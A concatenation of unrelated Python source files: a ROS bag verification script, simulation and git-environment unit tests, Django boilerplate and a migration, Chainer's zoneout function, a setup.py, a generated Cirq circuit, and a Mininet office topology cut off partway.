default=1000000,
metavar='B',
help='The size of each log file in bytes ' \
'before generating a new log file'
)
parser.add_argument(
'--kml-path',
metavar='PATH',
help='The path to the kml file to use for verification'
)
parser.set_defaults(log_level=logging.WARNING)
## Parse all positional arguments and options.
# Parse the positional arguments and options specified into the global FLAGS
# variable and store unknown arguments into a new argv to pass to main.
# @param argv An argument vector to parse
# @returns A new argv for use in main
def parse_args(argv):
global FLAGS #pylint: disable=global-statement
# Argument parser from argparse
parser = argparse.ArgumentParser()
# Add all of the positional arguments
add_positional_arguments(parser)
# Add all of the optional arguments
add_optional_arguments(parser)
# Parse the arguments into FLAGS and argv
FLAGS, _argv = parser.parse_known_args(argv)
return _argv
## Get the main logger.
# Get the main logger or create a main logger if one does not exist
# @returns The main logger
def get_logger():
global _LOGGER #pylint: disable=global-statement
# Check if the logger has already been created
if not _LOGGER:
# Get a logger and name it
logger = logging.getLogger('main')
# Set the logging level for the current program
logger.setLevel(logging.DEBUG)
# Clean user input and make sure the directory exists
log_dir = util.clean_directory_name(FLAGS.log_dir) # pylint: disable=no-member
util.ensure_directory_exists(log_dir) # pylint: disable=no-member
# Clean user input and get just the name
if FLAGS.log_name.endswith('/'):
log_name = os.path.dirname(FLAGS.log_name)
else:
log_name = os.path.basename(FLAGS.log_name)
# Add the output handler.
_file_handler = logging.handlers.RotatingFileHandler(
os.path.join(log_dir, log_name),
maxBytes=FLAGS.log_size,
backupCount=FLAGS.num_logs
)
_file_handler.setFormatter(logging.Formatter(
fmt='%(asctime)s.%(msecs)03d %(message)s',
datefmt='%Y_%m_%d %H:%M:%S'
))
_file_handler.setLevel(logging.DEBUG)
logger.addHandler(_file_handler)
# Add the output handler.
_handler = logging.StreamHandler(sys.stdout)
_handler.setFormatter(logging.Formatter(fmt='%(message)s'))
_handler.setLevel(FLAGS.log_level)
logger.addHandler(_handler)
# Get a lock on the logger
with _LOGGER_LOCK:
# Set the global logger
_LOGGER = logger
return _LOGGER
## Determine if a message is valid
# Determine if a message is valid to be used for indexing
# in an old bag
# @param message The message to verify
# @returns Bool if message is valid for use in indexing in an old bag
def is_valid(value):
if value.topic not in ILLEGAL_TOPICS:
# Message must have a header field
# This is how to check for a header according
# to the ROS Cookbook and it's twice as fast
# as hasattr(value.message, 'header') so ¯\_(ツ)_/¯
if value.message._has_header: # pylint: disable=protected-access
return True
return False
## Get the key from a bag message
# Gets the unique key for a message from a bag
# @param bag_message The bag message to get the unique key for
# @returns collections.namedtuple MessageKey or TransformKey that represents
# the unique key value of the bag message
def get_message_key(bag_message):
logger = get_logger()
key = None
# Skip illegal topics
if bag_message.topic not in ILLEGAL_TOPICS:
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
key = bag_message.message.data
# Handle /special topic
# use this template to create a handler for topics that have weird data vars
elif bag_message.topic == '/special':
transform = bag_message.message.transforms[0]
key = TransformKey(transform.header.seq,
transform.header.stamp.secs,
transform.header.stamp.nsecs,
transform.child_frame_id)
# ***********************************
elif is_valid(bag_message):
# Message key is a tuple of the sequence number and timestamp
# from the header of the message
key = MessageKey(bag_message.message.header.seq,
bag_message.message.header.stamp.secs,
bag_message.message.header.stamp.nsecs)
else:
logger.info('No handler for topic %s', bag_message.topic)
logger.debug('message: %s\n', bag_message.message)
return key
## Handle comparison of the special case /andBeyond topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int The value of the comparison between current_key and key
def and_beyond_handler(current_key, key):
diff = current_key - key
if diff > 0:
return diff
return None
## Handle comparison of the special case /special topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns Bool The value of the comparison between current_key and key
def special_handler(current_key, key):
key_is_good = False
if current_key.secs - key.secs > 0:
key_is_good = True
elif current_key.secs - key.secs == 0:
if current_key.nsecs - key.nsecs > 0:
key_is_good = True
return key_is_good
## Compares keys of messages, calling the special case handlers if needed
# @param bag_message The message from the bag
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int, Bool, or None The value of the comparison between
# current_key and key
def compare_keys(bag_message, current_key, key):
logger = get_logger()
# Skip illegal topics
if bag_message.topic in ILLEGAL_TOPICS:
logger.debug('Illegal topic: %s', bag_message.topic)
return None
ret_val = None
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
ret_val = and_beyond_handler(current_key, key)
# Handle /special topic
elif bag_message.topic == '/special':
ret_val = special_handler(current_key, key)
elif is_valid(bag_message):
ret_val = current_key.seq - key.seq
return ret_val
## Handle the verification of any special case topics that require
# different key verification logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify_special(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic == '/special':
key = topic_connection.get_key(current_key.child_frame_id)
if key is not None:
if not tf_handler(current_key, key):
print('Topic {} may not line up.'.format(bag_message.topic))
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
key)
logger.debug('verify_special topic_connection: %s, current_key: %s',
topic_connection, current_key)
topic_connection.set_key(current_key.child_frame_id, current_key)
## Handle the verification of all topics not requiring special case logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic in SPECIAL_TOPICS:
verify_special(bag_message, topic_connection, current_key)
return
if len(topic_connection.keys) == 0:
topic_connection.add_key(current_key)
return
lowest_diff = None
index = -1
for i, key in enumerate(topic_connection.keys):
diff = compare_keys(bag_message, current_key, key)
if diff is not None:
if lowest_diff is None or diff < lowest_diff:
lowest_diff = diff
index = i
if lowest_diff is None:
logger.debug('lowest_diff is None.\n' \
'current_key: %s;\n' \
'topic_connection: %s',
current_key,
topic_connection)
return
if lowest_diff == 1:
topic_connection.set_key(index, current_key)
logger.debug('lowest_diff == 1.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= 0 and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff <= 0 and len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff > FLAGS.tolerance and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff > FLAGS.tolerance and ' \
'len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= FLAGS.tolerance:
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
print('Topic {} does not line up by {} messages'.format(
bag_message.topic, lowest_diff))
CURRENT_REPORT.add_bad_topic(bag_message.topic, lowest_diff)
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
topic_connection.get_key(index))
topic_connection.set_key(index, current_key)
## Verify the contents of a single file
# @param file The path to the file to verify
# @param topic_connections All topic connections
def verify_file(file, topic_connections):
with rosbag.Bag(file, 'r') as bag:
bag_info = bag.get_type_and_topic_info()
topic_connections[file] = set(bag_info.topics.keys())
for topic, value in bag_info.topics.items():
if topic in ILLEGAL_TOPICS:
continue
topic_connection = topic_connections.get(topic)
if topic_connection:
topic_connection.connections = value.connections
else:
if topic in SPECIAL_TOPICS:
topic_connections[topic] = TopicConnection(
topic, value.connections, special_topic=True)
else:
topic_connections[topic] = TopicConnection(
topic, value.connections)
messages = bag.read_messages()
for bag_message in messages:
if bag_message.topic in ILLEGAL_TOPICS:
continue
current_key = get_message_key(bag_message)
verify(
bag_message,
topic_connections[bag_message.topic],
current_key
)
## Reset the keys for specific topics
# @param topic_connections All topic connections
# @param topics_to_clear The list of topics to clear the keys of
def reset_topics(topic_connections, topics_to_clear):
for topic in topics_to_clear:
topic_connection = topic_connections.get(topic)
if topic_connection is not None:
topic_connection.reset()
## Verify all the files in a directory
# @param files_list The list of file paths to verify
# @param tbc The TopicBagChecker to use for verification of bags
# and clearing of keys
def verify_files_in_directory(files_list, tbc):
logger = get_logger()
mode_pattern = r'^[a-zA-Z0-9_ -/()]*\d+_(?P<mode>.*)_\d+\.bag$'
topic_connections = {}
previous_mode = None
for file in files_list:
logger.info('Processing file %s', file)
if previous_mode is not None:
match = re.match(mode_pattern, file)
if match is not None:
current_mode = match.group('mode')
if current_mode != previous_mode:
topics_to_clear = tbc.process_bag(previous_mode,
current_mode)
reset_topics(topic_connections, topics_to_clear)
previous_mode = current_mode
else:
match = re.match(mode_pattern, file)
if match:
previous_mode = match.group('mode')
logger.debug('previous_mode: %s', previous_mode)
verify_file(file, topic_connections)
## Gets the path to the kml file
# Gets the path to the kml file using the kml-file command line argument first.
# If no command line parameter is found or it is invalid, it looks for a kml
# file in the directory that is currently being processed. If there is still no
# kml file found, the final place checked is in the ddr_data_director package
# @param directory The current directory being verified
# @returns String The path to the kml file
def get_kml_paths(directory):
logger = get_logger()
kml_glob_pattern = '{}/*.xml'
# Check if the user specified a kml file
if FLAGS.kml_path:
if not FLAGS.kml_path.endswith('/'):
kml_path = os.path.expanduser(FLAGS.kml_path)
if os.path.isfile(kml_path):
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.chosen_kml_name = os.path.basename(kml_path)
CURRENT_REPORT.kml_reason = \
'User specified a KML file for verification'
return [kml_path]
logger.info(
'"%s" is not a valid kml path. Attempting to find a kml in "%s"',
kml_path,
directory
)
# User did not specify a kml, attempt to find one in the current directory
kml_paths = glob.glob(kml_glob_pattern.format(directory))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was found in capture folder'
return kml_paths
# No kml in current directory, attempt to find one
# in the ddr_data_recorder ros package
ddr_dir = os.path.join(
SCRIPTS_PATH,
'dynamic_recording'
)
logger.info(
'No kml file in "%s". Attempting to find a kml in "%s"',
directory,
ddr_dir
)
kml_paths = glob.glob(kml_glob_pattern.format(ddr_dir))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was not found in capture ' \
'folder, but was found in the installation directory'
return kml_paths
logger.info('No kml files found.')
return []
## Gets the path to the markdown file
# Gets the path to the markdown file in the curent directory. If multiple files
# exist, one is picked at random (due to how glob works).
# @param directory The current directory being verified
# @returns String The path to the markdown file
def get_markdown_paths(directory):
markdown_paths = glob.glob(os.path.join(directory, '*.md'))
if len(markdown_paths) == 1:
return markdown_paths[0]
if markdown_paths:
return markdown_paths
logger = get_logger()
logger.info('No markdown files found in "%s"', directory)
return []
## Gets the kml hash from the markdown file
# Looks through the markdown file and finds the line that contains the hash of
# the kml file used when it was created
# @param markdown_path The path to the markdown file to get the hash from
# @returns String The hash of the kml from the markdown
def get_markdown_hash(markdown_path):
logger = get_logger()
try:
with open(markdown_path, 'rb', 0) as _file, \
mmap.mmap(_file.fileno(), 0, access=mmap.ACCESS_READ) \
as markdown_file:
search_result = re.search(
br'## Hash of Used XML file \(md5\): (?P<hash>[0-9a-f]{32})',
markdown_file
)
if search_result:
markdown_hash = search_result.group('hash').decode('utf-8')
if CURRENT_REPORT is not None:
CURRENT_REPORT.markdown_hash_exists = True
CURRENT_REPORT.markdown_hash = markdown_hash
logger.info('Hash for kml found in "%s"', markdown_path)
return markdown_hash
except ValueError:
pass
logger.info('No hash for kml found in "%s"', markdown_path)
return ''
## Verifies that the hash of the kml file and the hash from the markdown file
# match
# @param kml_path The path to the kml file to verify
# @param markdown_path The path to the markdown file to verify the kml against
# @returns Bool True if the hashes match, False if they do not
def verify_kml_hash(kml_paths, markdown_paths):
logger = get_logger()
for markdown_path in markdown_paths:
markdown_kml_hash = get_markdown_hash(markdown_path)
if markdown_kml_hash:
logger.debug('markdown_kml_hash = %s', markdown_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_markdown_name = \
os.path.basename(markdown_path)
break
for kml_path in kml_paths:
current_kml_hash = util.generate_hash(kml_path) # pylint: disable=no-member
if not markdown_kml_hash:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return False, kml_path
if current_kml_hash == markdown_kml_hash:
logger.debug('kml_hash = %s', current_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return True, kml_path
return False, ''
def write_report():
if CURRENT_REPORT is not None:
with CURRENT_REPORT:
CURRENT_REPORT.write_header()
CURRENT_REPORT.write_settings(**vars(FLAGS))
CURRENT_REPORT.write_kml_section()
CURRENT_REPORT.write_files_verified()
CURRENT_REPORT.write_unverified_topics(ILLEGAL_TOPICS)
CURRENT_REPORT.write_bad_topics()
def main():
global CURRENT_REPORT # pylint: disable=global-statement
argv = [sys.argv[0]] + parse_args(sys.argv[1:])
logger = get_logger()
logger.debug('FLAGS=%s', FLAGS)
logger.debug('argv=%s', argv)
logger.info('Unable to verify the following topics:\n%s', pprint.pformat(
ILLEGAL_TOPICS))
logger.info('Topics requiring special handling:\n%s', pprint.pformat(
SPECIAL_TOPICS))
directories = map(os.path.expanduser, FLAGS.directories)
for directory in directories:
if os.path.isdir(directory):
logger.info('Processing directory "%s"', directory)
CURRENT_REPORT = VerificationReport(directory)
kml_paths = get_kml_paths(directory)
if not kml_paths:
print('Unable to verify "{}". No kml found.'.format(directory))
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = False
write_report()
continue
markdown_paths = get_markdown_paths(directory)
if not markdown_paths:
print('Unable to verify "{}". No markdown ' \
'to compare kml hash against.'.format(directory))
else:
hash_verified, kml_path = verify_kml_hash(
kml_paths, markdown_paths)
if CURRENT_REPORT is not None:
CURRENT_REPORT.matching_hashes = hash_verified
if not hash_verified:
print('Unable to verify {}. KML and markdown ' \
'hashes do not match.'.format(directory))
tbc = TopicBagChecker(kml_path)
files_list = util.get_sorted_files_list(directory) # pylint: disable=no-member
if CURRENT_REPORT is not None:
CURRENT_REPORT.files_list = files_list
verify_files_in_directory(files_list, tbc)
else:
logger.info('"%s" is not a directory.', directory)
write_report()
if __name__ == '__main__':
main()
|
""" Test utilities for testing
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2019-10-31
:Copyright: 2019, Karr Lab
:License: MIT
"""
from scipy.constants import Avogadro
import os
import shutil
import tempfile
import unittest
from de_sim.simulation_config import SimulationConfig
from wc_sim.multialgorithm_simulation import MultialgorithmSimulation
from wc_sim.sim_config import WCSimulationConfig
from wc_sim.simulation import Simulation
from wc_sim.testing.make_models import MakeModel
from wc_sim.testing.utils import (check_simul_results, plot_expected_vs_simulated, get_expected_dependencies,
create_run_directory)
class TestTestingUtils(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
self.results_dir = tempfile.mkdtemp(dir=self.tmp_dir)
self.args = dict(results_dir=tempfile.mkdtemp(dir=self.tmp_dir),
checkpoint_period=1)
de_simulation_config = SimulationConfig(max_time=10, output_dir=tempfile.mkdtemp(dir=self.tmp_dir))
self.wc_sim_config = WCSimulationConfig(de_simulation_config, checkpoint_period=1)
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_check_simul_results(self):
init_volume = 1E-16
init_density = 1000
molecular_weight = 100.
default_species_copy_number = 10_000
init_accounted_mass = molecular_weight * default_species_copy_number / Avogadro
init_accounted_density = init_accounted_mass / init_volume
expected_initial_values_compt_1 = dict(
init_volume=init_volume,
init_accounted_mass=init_accounted_mass,
init_mass= init_volume * init_density,
init_density=init_density,
init_accounted_density=init_accounted_density,
accounted_fraction = init_accounted_density / init_density
)
expected_initial_values = {'compt_1': expected_initial_values_compt_1}
model = MakeModel.make_test_model('1 species, 1 reaction',
init_vols=[expected_initial_values_compt_1['init_volume']],
init_vol_stds=[0],
density=init_density,
molecular_weight=molecular_weight,
default_species_copy_number=default_species_copy_number,
default_species_std=0,
submodel_framework='WC:deterministic_simulation_algorithm')
multialgorithm_simulation = MultialgorithmSimulation(model, self.wc_sim_config)
_, dynamic_model = multialgorithm_simulation.build_simulation()
check_simul_results(self, dynamic_model, None, expected_initial_values=expected_initial_values)
# test dynamics
simulation = Simulation(model)
results_dir = simulation.run(max_time=2, **self.args).results_dir
nan = float('NaN')
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]},
rel_tol=1E-5)
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 9.999e-14, 9.998e-14]}})
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[nan, nan, nan]}})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}},
rel_tol=0)
plots_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'results'))
os.makedirs(plots_dir, exist_ok=True)
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]},
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]},
expected_property_trajectories=\
{'compt_1':
{'mass':[nan, nan, nan]}})
def test_expected_dependencies(self):
eds = get_expected_dependencies()
self.assertEqual(eds['DynamicStopCondition']['reaction_9'], {'stop_condition_7'})
self.assertEqual(eds['DynamicStopCondition']['reaction_10'], set())
def test_create_run_directory(self):
def run_dir_test(self, run_dir):
self.assertTrue(os.path.isdir(run_dir))
os.rmdir(run_dir)
# rm the date dir if it's empty
try:
date_dir = os.path.abspath(os.path.join(run_dir, ".."))
os.rmdir(date_dir)
except OSError:
pass
run_dir_test(self, create_run_directory())
run_dir_test(self, create_run_directory(base_dir='/tmp/runs', in_repo=False))
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WatchInSGE.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
class Zoneout(function_node.FunctionNode):
"""Zoneout regularization."""
def __init__(self, zoneout_ratio):
self.zoneout_ratio = zoneout_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
def forward(self, inputs):
self.retain_inputs(())
h, x = inputs
xp = cuda.get_array_module(*x)
if xp is numpy:
flag_x = xp.random.rand(*x.shape) >= self.zoneout_ratio
else:
flag_x = (xp.random.rand(*x.shape) >=
self.zoneout_ratio)
self.flag_h = xp.ones_like(flag_x) ^ flag_x
self.flag_x = flag_x
return h * self.flag_h + x * self.flag_x,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
ret = []
if 0 in indexes:
ret.append(gy * self.flag_h)
if 1 in indexes:
ret.append(gy * self.flag_x)
return ret
def zoneout(h, x, ratio=.5, **kwargs):
"""zoneout(h, x, ratio=.5)
Drops elements of input variable and sets to previous variable randomly.
This function drops input elements randomly with probability ``ratio`` and
instead sets dropping element to their previous variable. In testing mode ,
it does nothing and just returns ``x``.
.. warning::
``train`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('train', train)``.
See :func:`chainer.using_config`.
Args:
h (~chainer.Variable): Previous variable.
x (~chainer.Variable): Input variable.
ratio (float): Zoneout ratio.
Returns:
~chainer.Variable: Output variable.
See the paper: `Zoneout: Regularizing RNNs by Randomly Preserving Hidden \
Activations <https://arxiv.org/abs/1606.01305>`_.
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
if configuration.config.train:
return Zoneout(ratio).apply((h, x))[0]
return x
|
#!/usr/bin/env python
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
# basic
name='tool-registry-client',
version='0.1.0',
# packages=setuptools.find_packages(exclude=["tests", "tests.*"]),
# py_modules=['hello'],
# scripts=['bin/nlp-evaluate'],
packages=setuptools.find_packages(),
entry_points={
# 'console_scripts': ['rocc-cli=roccclient.cli.__main__:main']
},
# requirements
python_requires='>=3.6.*',
install_requires=[
'click>=7.1.2',
'jsonschema>=3.2.0',
'synapseclient>=2.2.0'
],
# metadata to display on PyPI
description='Tool Registry Library for Python',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Sage-Bionetworks/tool-registry-client',
author='The Tool Registry Team',
author_email='thomas.schaffter@sagebionetworks.org',
license='Apache',
project_urls={
"Source Code": "https://github.com/Sage-Bionetworks/tool-registry-client", # noqa: E501
"Bug Tracker": "https://github.com/Sage-Bionetworks/tool-registry-client/issues", # noqa: E501
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Bio-Informatics'
]
)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-04-20 18:17
from __future__ import unicode_literals
from django.db import migrations
import mep.accounts.models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0018_merge_20180418_1607'),
]
operations = [
migrations.AlterField(
model_name='borrow',
name='end_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
migrations.AlterField(
model_name='borrow',
name='start_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
]
|
from unittest.mock import patch
from m.ci.config import Config, GitFlowConfig, MFlowConfig, Workflow
from m.ci.git_env import GitEnv, get_git_env
from m.core import issue
from m.core.fp import Good
from m.core.io import EnvVars
from ..util import FpTestCase
class GitEnvTest(FpTestCase):
config = Config(
owner='jmlopez-rod',
repo='m',
version='0.0.0',
m_dir='m',
workflow=Workflow.FREE_FLOW,
git_flow=GitFlowConfig(),
m_flow=MFlowConfig(),
)
env_vars = EnvVars(
ci_env=True,
github_token='super_secret_like_damn',
server_url='abc.xyz',
run_id='404',
run_number='1',
run_url='http://abc.xyz/404',
git_branch='refs/heads/master',
git_sha='git-sha-abc-123',
)
def test_local(self):
self.env_vars.ci_env = False
result = get_git_env(self.config, self.env_vars)
self.assert_ok(result)
self.assertDictEqual(
result.value.__dict__,
GitEnv(
sha='git-sha-abc-123',
branch='master',
target_branch='master',
).__dict__,
)
def test_read_git_env_fail(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.return_value = issue('made up issue')
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertIsNotNone(err.cause)
self.assertEqual(err.cause.message, 'made up issue')
def test_bad_github_response(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [Good({}), Good({})]
result = get_git_env(self.config, self.env_vars)
err = self.assert_issue(result, 'git_env failure')
self.assertEqual(
err.cause.message,
'`repository` path was not found',
)
def test_pass(self):
self.env_vars.ci_env = True
with patch('m.github.api.graphql') as graphql_mock:
graphql_mock.side_effect = [
Good(
dict(
repository=dict(
commit=dict(
message='Merge sha1 into sha2',
),
),
),
),
Good(
dict(
repository=dict(
commit=dict(
oid='123456789',
message='commit message',
),
),
),
),
]
result = get_git_env(self.config, self.env_vars)
self.assertFalse(result.is_bad)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=37
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=9
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=34
c.append(cirq.Z.on(input_qubit[3])) # number=35
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=36
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.H.on(input_qubit[0])) # number=5
c.append(cirq.H.on(input_qubit[1])) # number=6
c.append(cirq.H.on(input_qubit[2])) # number=7
c.append(cirq.H.on(input_qubit[3])) # number=8
c.append(cirq.H.on(input_qubit[3])) # number=31
c.append(cirq.CZ.on(input_qubit[0],input_qubit[3])) # number=32
c.append(cirq.H.on(input_qubit[3])) # number=33
c.append(cirq.X.on(input_qubit[3])) # number=27
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[3])) # number=28
c.append(cirq.CNOT.on(input_qubit[2],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[0])) # number=14
c.append(cirq.H.on(input_qubit[1])) # number=30
c.append(cirq.CZ.on(input_qubit[2],input_qubit[0])) # number=15
c.append(cirq.H.on(input_qubit[0])) # number=16
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=20
c.append(cirq.X.on(input_qubit[2])) # number=21
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=22
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=17
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=23
c.append(cirq.X.on(input_qubit[2])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=25
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[2])) # number=19
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq2117.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
|
# -*- coding: utf-8 -*-
"""Region office topology.
Office has tro floors
_________terminate_switch_____________________
| | |
switch-1-floor switch-2-floor
| | |
hosts switchF2 hosts
|
hosts
Hosts consist of PC+Phones, ATMs or Security devices (camers, etc)
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
"Simple topology example."
def __init__( self, hosts_per_sw, hnum, tnum):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
ts1 = self.addSwitch( 's1', dpid='%x' % 41)
s_fl1 = self.addSwitch( 's_fl1', dpid='%x' % 42)
s_fl2 = self.addSwitch( 's_fl2', dpid='%x' % 43)
s_f2_2 = self.addSwitch( 's_f2_2', dpid='%x' % 44)
self.addLink( ts1, s_fl1, 2, 1 )
self.addLink( ts1, s_fl2, 3, 1 )
self.addLink( s_fl2, s_f2_2, 2, 1 )
sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
self.addLink( sec1, s_fl1, 0, 2 )
self.addLink( sec2, s_fl2, 0, 3 )
atm1 = self.addHost( 'atm1', ip='172.16.26.18/28')
